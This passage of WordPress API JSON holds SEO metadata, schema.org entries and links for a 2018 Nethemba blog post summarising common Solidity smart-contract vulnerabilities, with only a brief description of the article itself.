vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nethemba.com\/de\/#website\",\"url\":\"https:\/\/nethemba.com\/de\/\",\"name\":\"Nethemba\",\"description\":\"We care about your 
security\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nethemba.com\/de\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sk-SK\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\",\"name\":\"Pavol Lupt\u00e1k\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"sk-SK\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"caption\":\"Pavol Lupt\u00e1k\"},\"sameAs\":[\"https:\/\/www.nethemba.com\/\"],\"url\":\"https:\/\/nethemba.com\/sk\/author\/nethemba-admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Summary of the common smart contracts vulnerabilities - Nethemba","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","og_locale":"sk_SK","og_type":"article","og_title":"Summary of the common smart contracts vulnerabilities - Nethemba","og_description":"Introduction Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. 
With billions of dollars at play and relatively low-level of [&hellip;]","og_url":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","og_site_name":"Nethemba","article_publisher":"https:\/\/www.facebook.com\/nethemba","article_published_time":"2018-05-25T07:49:34+00:00","article_modified_time":"2018-05-28T05:58:57+00:00","author":"Pavol Lupt\u00e1k","twitter_card":"summary_large_image","twitter_creator":"@nethemba","twitter_site":"@nethemba","twitter_misc":{"Autor":"Pavol Lupt\u00e1k","Predpokladan\u00fd \u010das \u010d\u00edtania":"16 min\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#article","isPartOf":{"@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/"},"author":{"name":"Pavol Lupt\u00e1k","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"headline":"Summary of the common smart contracts vulnerabilities","datePublished":"2018-05-25T07:49:34+00:00","dateModified":"2018-05-28T05:58:57+00:00","mainEntityOfPage":{"@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/"},"wordCount":3221,"commentCount":0,"keywords":["blockchain","crypto","cryptocurrencies","Ethereum","ICO","IT security","security audit","security vulnerabilities in Solidity","smart contracts","Solidity"],"articleSection":["Uncategorized @sk"],"inLanguage":"sk-SK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","url":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","name":"Summary of the common smart contracts vulnerabilities - 
Nethemba","isPartOf":{"@id":"https:\/\/nethemba.com\/de\/#website"},"datePublished":"2018-05-25T07:49:34+00:00","dateModified":"2018-05-28T05:58:57+00:00","author":{"@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"breadcrumb":{"@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb"},"inLanguage":"sk-SK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nethemba.com\/sk\/domov\/"},{"@type":"ListItem","position":2,"name":"Summary of the common smart contracts vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/nethemba.com\/de\/#website","url":"https:\/\/nethemba.com\/de\/","name":"Nethemba","description":"We care about your security","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nethemba.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sk-SK"},{"@type":"Person","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234","name":"Pavol Lupt\u00e1k","image":{"@type":"ImageObject","inLanguage":"sk-SK","@id":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","caption":"Pavol 
Lupt\u00e1k"},"sameAs":["https:\/\/www.nethemba.com\/"],"url":"https:\/\/nethemba.com\/sk\/author\/nethemba-admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/posts\/2791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/comments?post=2791"}],"version-history":[{"count":0,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/posts\/2791\/revisions"}],"wp:attachment":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/media?parent=2791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/categories?post=2791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/tags?post=2791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}